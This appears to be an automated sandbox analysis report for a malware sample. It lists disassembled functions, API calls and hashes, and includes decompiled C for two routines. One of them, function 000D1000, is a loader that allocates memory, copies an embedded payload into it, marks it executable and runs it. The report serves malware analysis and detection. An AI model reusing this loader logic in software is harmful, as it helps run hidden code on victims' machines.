Instruction Fuzzy Hash: C941AE32D0411AAFDB12AFA0EC44AFEBB75EF58310F258024F416A72A0DB718D55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0011D4E7, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122windowCOMMON

Download Yara Rule

APIs

CheckMenuItem.USER32(?,?,00000000), ref: 0011D516

Part of subcall function 001266DE: GetWindowTextW.USER32(?,?,00000100), ref: 00126734
Part of subcall function 001266DE: lstrcmpW.KERNEL32(?,0011D623,?,00000000), ref: 00126746
Part of subcall function 001266DE: SetWindowTextW.USER32(?,0011D623), ref: 00126752

SendMessageW.USER32(?,00000087,00000000,00000000), ref: 0011D531
SendMessageW.USER32(?,000000F1,?,00000000), ref: 0011D54E
SetMenuItemBitmaps.USER32(?,?,00000400,00000000,00287D88), ref: 0011D5BA
SetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0011D60A

Strings

0, xrefs: 0011D5F9
@, xrefs: 0011D600

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: ItemMenu$MessageSendTextWindow$BitmapsCheckInfolstrcmp
String ID: 0$@
API String ID: 72408025-1545510068
Opcode ID: 0a10d1d628d214a8f0e041593f2ad71d9e12c0b734874c73569fa43309b9b262
Instruction ID: 551e7e266a71ca874beb80b4d8e9e555c82a92eecc9e821d81d4bb3d06ae473d
Opcode Fuzzy Hash: 0a10d1d628d214a8f0e041593f2ad71d9e12c0b734874c73569fa43309b9b262
Instruction Fuzzy Hash: 5941CE31600215EFDB299F69E884FAAB7BAFF44704F248639F5089B550DB71E891CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0011EEBC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(000D1AAC,?,00000000), ref: 0011EEE2
GetProcAddress.KERNEL32(00000000,000D1AC8), ref: 0011EEF2
RtlEncodePointer.NTDLL(00000000), ref: 0011EEFB
RtlDecodePointer.NTDLL(002897AC), ref: 0011EF09
LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000), ref: 0011EF1D
GetSystemDirectoryW.KERNEL32(?,00000105), ref: 0011EF32

Strings

\, xrefs: 0011EF40

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Pointer$AddressDecodeDirectoryEncodeHandleLibraryLoadModuleProcSystem
String ID: \
API String ID: 4227638471-2967466578
Opcode ID: 9a1e743c2e7bd7263ee9863997bc083b796d918cfe8184df0d9e941dd2c8159c
Instruction ID: 43c8e74cf84d1f9d19047c02ddf334413f8582189d7ee0f2614189f8c3925d9d
Opcode Fuzzy Hash: 9a1e743c2e7bd7263ee9863997bc083b796d918cfe8184df0d9e941dd2c8159c
Instruction Fuzzy Hash: 5F21C331A0132ABBCB24ABE5AC4DFEA7BECAB15710F190475FC05D3140EB70D9958B91

Uniqueness

Uniqueness Score: -1.00%

Function 0012226B, Relevance: 12.1, APIs: 8, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 001222AF
BeginDeferWindowPos.USER32(00000008), ref: 001222C5
GetTopWindow.USER32(?), ref: 001222D7
GetDlgCtrlID.USER32(00000000), ref: 001222E0
SendMessageW.USER32(00000000,00000361,00000000,00000000), ref: 00122318
GetWindow.USER32(00000000,00000002), ref: 00122321
CopyRect.USER32(?,?), ref: 0012233C
EndDeferWindowPos.USER32(00000000), ref: 001223C8

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
String ID:
API String ID: 1228040700-0
Opcode ID: bf80bad8b17d7c890c29ac85d7c59a832e06cc22e5cd951aad9faf4a08415532
Instruction ID: 936817ae08ad80e03f108323ffefd3f176a1d7901cb461288095ca42b7f15d9a
Opcode Fuzzy Hash: bf80bad8b17d7c890c29ac85d7c59a832e06cc22e5cd951aad9faf4a08415532
Instruction Fuzzy Hash: D8512832900229EFCF15DFA4E884BEEB7B5BF49311F154069E805BB250DB79AD60CB64

Uniqueness

Uniqueness Score: -1.00%

Function 001349B2, Relevance: 12.1, APIs: 8, Instructions: 116COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00134A0C
ClientToScreen.USER32(?,?), ref: 00134A25
PtInRect.USER32(?,?,?), ref: 00134A35
WindowFromPoint.USER32(?,?), ref: 00134A49
SetCapture.USER32(?), ref: 00134AAF
ReleaseCapture.USER32 ref: 00134AF9
InvalidateRect.USER32(?,00000000,00000001), ref: 00134B14
UpdateWindow.USER32(?), ref: 00134B1D

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Rect$CaptureClientWindow$FromInvalidatePointReleaseScreenUpdate
String ID:
API String ID: 1999979895-0
Opcode ID: 0da16de9e0a83e534d16bed70e8c8c2bdff0eac92dbe84caddf35f5c43095f7f
Instruction ID: e3e96be3f7032c484d633bc01584e247bfb320981f94cd78c2b89a0cb87d919e
Opcode Fuzzy Hash: 0da16de9e0a83e534d16bed70e8c8c2bdff0eac92dbe84caddf35f5c43095f7f
Instruction Fuzzy Hash: C8415972900705DFDB209FA5D948BABF7F9FF99302F10452EE49A82164DB70A985CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0013B1F1, Relevance: 12.1, APIs: 8, Instructions: 112windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0013B233
InvalidateRect.USER32(?,00000000,00000001), ref: 0013B276
TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 0013B2CF
GetParent.USER32(?), ref: 0013B2DE
SendMessageW.USER32(?,00000111,?,?), ref: 0013B310
InvalidateRect.USER32(?,00000000,00000001,00000000), ref: 0013B330
UpdateWindow.USER32(?), ref: 0013B339
ReleaseCapture.USER32 ref: 0013B348

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Rect$InvalidateWindow$CaptureMenuMessageParentPopupReleaseSendTrackUpdate
String ID:
API String ID: 2465089168-0
Opcode ID: cd00fcebacaa6f4777fe045b196449570b3c25c00ebe0b2d02a0b2a40594ba7c
Instruction ID: 66af3defb1c13b0ffa3da6cfe9a6d3a1c8d1ab6fdf65656d7056de1ea5206386
Opcode Fuzzy Hash: cd00fcebacaa6f4777fe045b196449570b3c25c00ebe0b2d02a0b2a40594ba7c
Instruction Fuzzy Hash: 45410D71A04716FFDB189FA1D888AAAF7B9FB49300F10022EE55996650DB747820CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0011A357, Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

GlobalSize.KERNEL32(?), ref: 0011A3DC
GlobalAlloc.KERNEL32(00002002,00000000,?,?,80070057,?,00000000,?,?,0011A352,00000000,00000000,?,?,0011C058,?), ref: 0011A3F4
GlobalSize.KERNEL32(00000000), ref: 0011A405
GlobalFix.KERNEL32(?), ref: 0011A413
GlobalFix.KERNEL32(00000000), ref: 0011A41C
GlobalSize.KERNEL32(00000000), ref: 0011A429
GlobalUnWire.KERNEL32(00000000), ref: 0011A43A
GlobalUnWire.KERNEL32(?), ref: 0011A443

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Global$Size$Wire$Alloc
String ID:
API String ID: 3936089190-0
Opcode ID: 62c2f63a48a43c5293de222402392e958c79cea2941df5cf7c989598e0341c87
Instruction ID: 868d1f3607625eea2128bef2d69945f60184571cfd376325b01d648e728fb2b7
Opcode Fuzzy Hash: 62c2f63a48a43c5293de222402392e958c79cea2941df5cf7c989598e0341c87
Instruction Fuzzy Hash: 9C31D271601204BBCB18BBA5EC8CCAEBB69FF993607644079FD1682211DB719D909AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00118D79, Relevance: 12.1, APIs: 8, Instructions: 101memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00118D80
RtlEnterCriticalSection.NTDLL(?), ref: 00118D91
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,001192CB,00118752,001192F4,0011B475,00119580,?,001196B4,?,?,00119872,00000000), ref: 00118DAD
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,001192CB,00118752,001192F4,0011B475,00119580,?,001196B4), ref: 00118E1D
LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,001192CB,00118752,001192F4,0011B475,00119580), ref: 00118E37
RtlLeaveCriticalSection.NTDLL(00119872), ref: 00118E46
TlsSetValue.KERNEL32(?,00000000), ref: 00118E76
RtlLeaveCriticalSection.NTDLL(?), ref: 00118EAD

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: CriticalSection$AllocLeaveLocalValue$EnterH_prolog3_catch
String ID:
API String ID: 2715462074-0
Opcode ID: 7134a0d02df77f70226f114e3eb595fbabd7cee6d16d04e5e7787465dcbb6a99
Instruction ID: f58c4a9480cb30eb90235479296ffae12efcff4cb9402f61ddc216014611d31d
Opcode Fuzzy Hash: 7134a0d02df77f70226f114e3eb595fbabd7cee6d16d04e5e7787465dcbb6a99
Instruction Fuzzy Hash: CF31AC70500B05EFDB28AF64E8899AAF7B4FF90310B20C63DE51697690DF71E990CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001B93A0, Relevance: 12.1, APIs: 8, Instructions: 97COMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 001B93BB
GetParent.USER32(?), ref: 001B93D2
GetClientRect.USER32(?,?), ref: 001B9416
MapWindowPoints.USER32(?,?,?,00000002), ref: 001B9428
PtInRect.USER32(?,?,?), ref: 001B9438
GetClientRect.USER32(?,?), ref: 001B9465
MapWindowPoints.USER32(?,?,?,00000002), ref: 001B9477
PtInRect.USER32(?,?,?), ref: 001B9487

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Rect$Client$PointsWindow$ParentScreen
String ID:
API String ID: 1944725958-0
Opcode ID: 5b8f4e8db2b17dac9cb70795f1a0ef38bdd24bcfc95f900918fbe828dea1afe3
Instruction ID: 8fb5b59eba4a5d004dae13b33cff9870d86db7d7e6a5846b0195aeab8d275511
Opcode Fuzzy Hash: 5b8f4e8db2b17dac9cb70795f1a0ef38bdd24bcfc95f900918fbe828dea1afe3
Instruction Fuzzy Hash: 54317A32A00119AFCF11EFA4DD489EEBBB9FF49700B114169EA06D7260EB71DD028B90

Uniqueness

Uniqueness Score: -1.00%

Function 000D143A, Relevance: 12.1, APIs: 8, Instructions: 76
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E000D143A(void** __edx, long* _a4) {
				long _v4;
				signed int _t7;
				void* _t10;
				signed int _t11;
				signed int _t13;
				long* _t20;
				CHAR* _t21;
				void* _t24;
				long _t26;
				void** _t27;

				_t26 = 1;
				_t27 = __edx;
				_t24 = CreateFileA(_t21, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t24 == 0xffffffff) {
					return 0;
				}
				_t7 = GetFileSize(_t24, 0);
				_t20 = _a4;
				 *_t20 = _t7;
				if(_t7 != 0) {
					_t10 = HeapAlloc(GetProcessHeap(), 8, _t7 + 1);
					 *_t27 = _t10;
					if(_t10 != 0) {
						_v4 = _v4 & 0x00000000;
						if( *_t20 != 0) {
							_t11 = ReadFile(_t24, _t10,  *_t20,  &_v4, 0);
							asm("sbb eax, eax");
							_t13 =  ~_t11 & _v4;
						} else {
							_t13 = 0;
						}
						if(_t13 !=  *_t20) {
							_t26 = 0;
							if( *_t27 != 0) {
								HeapFree(GetProcessHeap(), 0,  *_t27);
							}
						}
					} else {
						_t26 = 0;
					}
				} else {
					 *_t27 =  *_t27 & _t7;
				}
				CloseHandle(_t24);
				return _t26;
			}

0x000d144c
0x000d144d
0x000d145c
0x000d1461
0x00000000
0x000d1463
0x000d1469
0x000d146f
0x000d1473
0x000d1477
0x000d1489
0x000d148f
0x000d1494
0x000d149a
0x000d14a2
0x000d14b3
0x000d14bb
0x000d14bd
0x000d14a4
0x000d14a4
0x000d14a4
0x000d14c3
0x000d14c5
0x000d14ca
0x000d14d7
0x000d14d7
0x000d14ca
0x000d1496
0x000d1496
0x000d1496
0x000d1479
0x000d1479
0x000d1479
0x000d14de
0x00000000

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,?,000D128D,?), ref: 000D1456
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,000D128D,?), ref: 000D1469
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 000D14DE

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: 3daf484ac7fb521f5118b4b5c2d6d5f39d96bdf18e569da9fc4e4af81bcf6331
Instruction ID: c47628d9dadf4193f0a57431d4f2d4e9876e476e61c1c654c4e393116931191c
Opcode Fuzzy Hash: 3daf484ac7fb521f5118b4b5c2d6d5f39d96bdf18e569da9fc4e4af81bcf6331
Instruction Fuzzy Hash: 14116072615311BFEB614F60EC88BBB7BA8FB45766F114626FE46D1180DB7488048A71

Uniqueness

Uniqueness Score: -1.00%

Function 001470F2, Relevance: 12.1, APIs: 8, Instructions: 65COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000031), ref: 00147100
GetSystemMetrics.USER32(00000032), ref: 0014710E
SetRectEmpty.USER32(00289F9C), ref: 00147121
EnumDisplayMonitors.USER32(00000000,00000000,00146F86,00289F9C), ref: 00147131
SystemParametersInfoW.USER32(00000030,00000000,00289F9C,00000000), ref: 00147140
SystemParametersInfoW.USER32(00001002,00000000,00289FC0,00000000), ref: 0014716D
SystemParametersInfoW.USER32(00001012,00000000,00289FC4,00000000), ref: 00147181
SystemParametersInfoW.USER32(0000100A,00000000,00289FD4,00000000), ref: 001471A7

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: System$InfoParameters$Metrics$DisplayEmptyEnumMonitorsRect
String ID:
API String ID: 2614369430-0
Opcode ID: 3399a5fc96564e5685dad32ccedd07980a0ddd38d61ee8bc1ac60829e799f86c
Instruction ID: 0e1443ce3b6b85c59559d8dd6d2247c81986419015a836d641047440a1eb5f51
Opcode Fuzzy Hash: 3399a5fc96564e5685dad32ccedd07980a0ddd38d61ee8bc1ac60829e799f86c
Instruction Fuzzy Hash: 742159B0601616BFE3059F71AC8CAE3BBACFF5A745F014229E548C6190DBB0A951CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00122402, Relevance: 10.6, APIs: 7, Instructions: 128windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0012242F
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00122453
UpdateWindow.USER32(?), ref: 0012246D
SendMessageW.USER32(?,00000121,?,?), ref: 00122490
SendMessageW.USER32(?,0000036A,00000000,?), ref: 001224A7
UpdateWindow.USER32(?), ref: 001224F8
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00122540

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Message$PeekSendUpdateWindow$Parent
String ID:
API String ID: 2799049384-0
Opcode ID: da597578b34b2257b81664a33e5e6090d0d8b70173c8baef1522015b44a64075
Instruction ID: aa7b7e2266d96e4569e0813d88d7f37642e968f0b8016c893b9f7e6d9cc7d0c2
Opcode Fuzzy Hash: da597578b34b2257b81664a33e5e6090d0d8b70173c8baef1522015b44a64075
Instruction Fuzzy Hash: C8419230B00265BBDB25AFA9EC89BADBBB4BF15750F108164F905A7191DBB4DD60CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0013B3DA, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0013B3E1

Part of subcall function 001768B8: __EH_prolog3.LIBCMT ref: 001768BF

Part of subcall function 0018FFEE: SetRectEmpty.USER32(?), ref: 00190029

SetRectEmpty.USER32(?), ref: 0013B525
SetRectEmpty.USER32 ref: 0013B536
SetRectEmpty.USER32(?), ref: 0013B53D

Strings

False, xrefs: 0013B59B
True, xrefs: 0013B54F

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: EmptyRect$H_prolog3
String ID: False$True
API String ID: 3752103406-1895882422
Opcode ID: 9dd41149bc8c8630ddbb6b587413103d5effadf38fedc2e934c10c9d46ab8d7e
Instruction ID: 5a7eed1752c73d2955245816cb161c30f712924d29c38366b85d240b8b010b94
Opcode Fuzzy Hash: 9dd41149bc8c8630ddbb6b587413103d5effadf38fedc2e934c10c9d46ab8d7e
Instruction Fuzzy Hash: 8C51D2B09157119FCB0ADF68D4857A8BBE8BF18700F1882BEA91D9B396CB741244CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00119842, Relevance: 10.6, APIs: 7, Instructions: 119windowthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 0011970F: GetParent.USER32(?), ref: 0011975D
Part of subcall function 0011970F: GetLastActivePopup.USER32(?), ref: 00119770
Part of subcall function 0011970F: IsWindowEnabled.USER32(?), ref: 00119784
Part of subcall function 0011970F: EnableWindow.USER32(?,00000000), ref: 00119797

EnableWindow.USER32(?,00000001), ref: 0011988D
GetWindowThreadProcessId.USER32(?,?), ref: 001198A3
GetCurrentProcessId.KERNEL32 ref: 001198AD
SendMessageW.USER32(?,00000376,00000000,00000000), ref: 001198C3
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00119946
MessageBoxW.USER32(?,?,?,?), ref: 00119968
EnableWindow.USER32(00000000,00000001), ref: 0011998D

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Window$Enable$MessageProcess$ActiveCurrentEnabledFileLastModuleNameParentPopupSendThread
String ID:
API String ID: 1924968399-0
Opcode ID: 07160c9ec0f4e672d28770f789df620730e3d172a455abb2d4a633e1e6aa03f6
Instruction ID: fe82e45e9e838e7b8cd63ea7840a80dbe4c476c40b3862ca5c2d069d836ba4b8
Opcode Fuzzy Hash: 07160c9ec0f4e672d28770f789df620730e3d172a455abb2d4a633e1e6aa03f6
Instruction Fuzzy Hash: 85418075A4021D9BDB28AF64DC99BEEB3B8AB55700F1401BEE529D7250DB708EC08F60

Uniqueness

Uniqueness Score: -1.00%

Function 001184F0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(000D13A8), ref: 00118685

Part of subcall function 0011844E: GetProcAddress.KERNEL32(?,?), ref: 0011847B

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0011859F
SetLastError.KERNEL32(0000006F), ref: 001185B3
GetLastError.KERNEL32 ref: 0011860A

Strings

@, xrefs: 00118660
, xrefs: 001185BE

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: ErrorLast$AddressFileLibraryLoadModuleNameProc
String ID: $@
API String ID: 3640817601-1077428164
Opcode ID: 599d4ea3d6ac6da43dfb701032ce1fc160e99c2b4dd4a1d803083b457ab9e384
Instruction ID: 41adee32aee09f7c92ea1f662666566c93bdf1e5fcff2955a7ee2f0c76cdabf9
Opcode Fuzzy Hash: 599d4ea3d6ac6da43dfb701032ce1fc160e99c2b4dd4a1d803083b457ab9e384
Instruction Fuzzy Hash: ED417570901214AADB389B649C8DBEE76B8AB54751F1482B6F918E61D0EF78CEC0CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0013486B, Relevance: 10.6, APIs: 7, Instructions: 101windowtimeCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 001348FD
SendMessageW.USER32(?,00000111,?,?), ref: 0013492A
IsWindow.USER32(?), ref: 00134933
IsWindow.USER32(?), ref: 00134955
ReleaseCapture.USER32 ref: 00134967
KillTimer.USER32(?,0000EC0D), ref: 00134983
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 001349A3

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: MessageSendWindow$CaptureKillParentReleaseTimer
String ID:
API String ID: 3338874567-0
Opcode ID: 06df80d3c43e4ba047dda4f5db922db044d6c86898ba151dcdaa8afaadcf0d1b
Instruction ID: f83dfa6e97ac1fe6479ed3c120258520b72c24c201c870ba6209798036af1f37
Opcode Fuzzy Hash: 06df80d3c43e4ba047dda4f5db922db044d6c86898ba151dcdaa8afaadcf0d1b
Instruction Fuzzy Hash: 60316030702622FFD7299B75DC48BAAFB69FF49B01F00422AF54992150CB70A850CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 000D1000, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E000D1000(void* __ecx, void* __edx) {
				char _v296;
				intOrPtr _v300;
				signed int _v304;
				char _v308;
				void* _t20;
				_Unknown_base(*)()* _t23;
				_Unknown_base(*)()* _t27;
				intOrPtr* _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr* _t46;
				intOrPtr* _t49;
				void* _t51;
				void* _t56;

				_t51 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 5));
				if( *((intOrPtr*)(__ecx + 1)) + _t42 > __edx) {
					L10:
					_t20 = 0;
				} else {
					_t40 = _t42 + __ecx;
					_t23 = GetProcAddress(LoadLibraryA("KERNEL32.DLL"), __ecx + 0x1e);
					if(_t23 == 0) {
						goto L10;
					} else {
						_t49 =  *_t23(0,  *((intOrPtr*)(_t51 + 9)), 0x3000, 4);
						if(_t49 == 0) {
							goto L10;
						} else {
							_t43 =  *((intOrPtr*)(_t51 + 9));
							_t46 = _t40;
							if(_t40 != 0 && _t43 != 0) {
								_t56 = _t49 - _t40;
								do {
									 *((char*)(_t46 + _t56)) =  *_t46;
									_t46 = _t46 + 1;
									_t43 = _t43 - 1;
								} while (_t43 != 0);
							}
							_t27 = GetProcAddress(LoadLibraryA("KERNEL32.DLL"), _t51 + 0x2e);
							if(_t27 == 0) {
								goto L10;
							} else {
								_push( &_v296);
								_push(0x20);
								_push( *((intOrPtr*)(_t51 + 9)));
								_push(_t49);
								if( *_t27() == 0) {
									goto L10;
								} else {
									_v304 = _v304 & 0x00000000;
									_v308 =  *((intOrPtr*)(_t51 + 9)) + _t40;
									_v300 =  *0xd3000;
									GetModuleFileNameA(0,  &_v296, 0x104);
									 *_t49( &_v308);
									_t20 = 1;
								}
							}
						}
					}
				}
				return _t20;
			}

0x000d100f
0x000d1015
0x000d101c
0x000d10d3
0x000d10d3
0x000d1022
0x000d102b
0x000d1035
0x000d103d
0x00000000
0x000d1043
0x000d1051
0x000d1055
0x00000000
0x000d1057
0x000d1057
0x000d105a
0x000d105e
0x000d1066
0x000d1068
0x000d106a
0x000d106d
0x000d106e
0x000d106e
0x000d1068
0x000d1083
0x000d108b
0x00000000
0x000d108d
0x000d1091
0x000d1092
0x000d1094
0x000d1097
0x000d109c
0x00000000
0x000d109e
0x000d10a1
0x000d10a8
0x000d10b1
0x000d10c1
0x000d10cc
0x000d10d0
0x000d10d0
0x000d109c
0x000d108b
0x000d1055
0x000d103d
0x000d10dc

APIs

LoadLibraryA.KERNEL32(KERNEL32.DLL,?,00000400,?), ref: 000D102E
GetProcAddress.KERNEL32(00000000), ref: 000D1035
LoadLibraryA.KERNEL32(KERNEL32.DLL,?), ref: 000D107C
GetProcAddress.KERNEL32(00000000), ref: 000D1083
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 000D10C1

Strings

KERNEL32.DLL, xrefs: 000D1026, 000D1077

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$FileModuleName
String ID: KERNEL32.DLL
API String ID: 2206896924-2576044830
Opcode ID: 46dc2641d0e0fb71b6c5f335156084aa43571b739df4811111e69d101be45401
Instruction ID: bb8d93d7620af67584e34147c5fbe5ad97224681aa2692bc7fb7d8fb8de18eff
Opcode Fuzzy Hash: 46dc2641d0e0fb71b6c5f335156084aa43571b739df4811111e69d101be45401
Instruction Fuzzy Hash: CA21C7726043456BE320AFA5DC45BA7BFECEB48701F00452AFB59CA681EAB5E9048771

Uniqueness

Uniqueness Score: -1.00%

Function 0012695B, Relevance: 10.6, APIs: 7, Instructions: 78COMMON

Download Yara Rule

APIs

RealChildWindowFromPoint.USER32(?,?,?), ref: 0012697F
ClientToScreen.USER32(?,?), ref: 0012699A
GetWindow.USER32(?,00000005), ref: 001269A3
GetDlgCtrlID.USER32(00000000), ref: 001269B3
GetWindowRect.USER32(00000000,?), ref: 001269E1
PtInRect.USER32(?,?,?), ref: 001269F1
GetWindow.USER32(00000000,00000002), ref: 00126A00

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Window$Rect$ChildClientCtrlFromPointRealScreen
String ID:
API String ID: 3369362809-0
Opcode ID: b42c10b9396cbc010e5731c93ca8cf990432303a281915c14bf485bc6c9d9534
Instruction ID: 6683884ea9303b036a066c3ef1107164f7a03670b1f9ad527173f061793bd9f2
Opcode Fuzzy Hash: b42c10b9396cbc010e5731c93ca8cf990432303a281915c14bf485bc6c9d9534
Instruction Fuzzy Hash: 4A21747190122AAFCB11AFA8EC489AFB7BCEF46710B154129F911E3290DF74DD55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0025C215, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 0025C280
api-ms-, xrefs: 0025C26C

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 2cc155fe5a59c745caffe820f4fcb84501ebfecf3cb453510788f50a16c1b563
Instruction ID: 2e728feba69060ebb8426cc621068f4b2a832aaba1b8044e7eb99ddc1583e368
Opcode Fuzzy Hash: 2cc155fe5a59c745caffe820f4fcb84501ebfecf3cb453510788f50a16c1b563
Instruction Fuzzy Hash: 95210A32A25312BFDB219FB4EC45B2A37589F51B62F310561ED05FB290FAB0DC1896D8

Uniqueness

Uniqueness Score: -1.00%

Function 0011E548, Relevance: 10.6, APIs: 7, Instructions: 69COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0011E565
GetWindowRect.USER32(?,?), ref: 0011E589
ScreenToClient.USER32(?,?), ref: 0011E596
ScreenToClient.USER32(?,?), ref: 0011E5A3
EqualRect.USER32(?,?), ref: 0011E5AE
